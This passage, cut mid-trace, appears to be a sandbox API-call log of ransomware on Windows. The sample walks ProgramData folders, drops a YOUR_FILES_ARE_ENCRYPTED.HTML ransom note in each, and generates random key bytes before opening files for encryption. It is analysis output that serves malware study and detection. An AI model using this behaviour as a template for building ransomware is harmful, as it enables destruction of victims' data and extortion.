lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="DataMart", cAlternateFileName="")) returned 1 [0106.149] StrStrIW (lpFirst="DataMart", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.149] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart") returned 37 [0106.149] GetProcessHeap () returned 0x600000 [0106.149] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.151] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart" [0106.151] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\*" [0106.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.151] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.152] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="PaidWiFi", cAlternateFileName="")) returned 1 [0106.152] StrStrIW (lpFirst="PaidWiFi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.152] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi") returned 46 [0106.152] GetProcessHeap () returned 0x600000 [0106.152] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.153] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi" [0106.153] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\*" [0106.153] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.154] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.154] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 0 [0106.154] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.154] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0106.154] GetProcessHeap () returned 0x600000 [0106.154] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.155] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\datamart\\paidwifi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.155] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.156] CloseHandle (hObject=0x314) returned 1 [0106.157] GetProcessHeap () returned 0x600000 [0106.157] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.157] GetProcessHeap () returned 0x600000 [0106.157] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="PaidWiFi", cAlternateFileName="")) returned 0 [0106.158] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.158] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0106.158] GetProcessHeap () returned 0x600000 [0106.158] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.159] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\datamart\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.159] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.161] CloseHandle (hObject=0x308) returned 1 [0106.161] GetProcessHeap () returned 0x600000 [0106.161] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.161] GetProcessHeap () returned 0x600000 [0106.161] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.162] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0106.162] StrStrIW (lpFirst="Device Stage", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.162] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned 41 [0106.162] GetProcessHeap () returned 0x600000 [0106.162] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.164] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage" [0106.164] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*" [0106.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.164] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.164] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Device", cAlternateFileName="")) returned 1 [0106.164] StrStrIW (lpFirst="Device", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.164] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned 48 [0106.164] GetProcessHeap () returned 0x600000 [0106.164] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.166] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device" [0106.166] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*" [0106.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0106.166] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.166] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0106.166] StrStrIW (lpFirst="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.166] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 87 [0106.166] GetProcessHeap () returned 0x600000 [0106.166] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0106.167] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0106.167] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*" [0106.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.170] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0106.170] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="background.png", cAlternateFileName="")) returned 1 [0106.170] StrStrIW (lpFirst="background.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.170] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 102 [0106.170] PathFindExtensionW (pszPath="background.png") returned=".png" [0106.170] lstrlenW (lpString=".png") returned 4 [0106.170] PathFindExtensionW (pszPath="background.png") returned=".png" [0106.170] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.170] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.171] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0106.171] StrStrIW (lpFirst="behavior.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.171] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 100 [0106.171] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0106.171] lstrlenW (lpString=".xml") returned 4 [0106.171] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0106.171] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.171] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.172] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="device.png", cAlternateFileName="")) returned 1 [0106.172] StrStrIW (lpFirst="device.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.172] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 98 [0106.172] PathFindExtensionW (pszPath="device.png") returned=".png" [0106.172] lstrlenW (lpString=".png") returned 4 [0106.172] PathFindExtensionW (pszPath="device.png") returned=".png" [0106.172] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.172] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.172] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0106.172] StrStrIW (lpFirst="overlay.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.172] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 99 [0106.172] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0106.172] lstrlenW (lpString=".png") returned 4 [0106.172] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0106.172] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.172] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.172] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0106.173] StrStrIW (lpFirst="superbar.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.173] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 100 [0106.173] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0106.173] lstrlenW (lpString=".png") returned 4 [0106.173] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0106.173] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.173] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.173] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="superbar.png", cAlternateFileName="")) returned 0 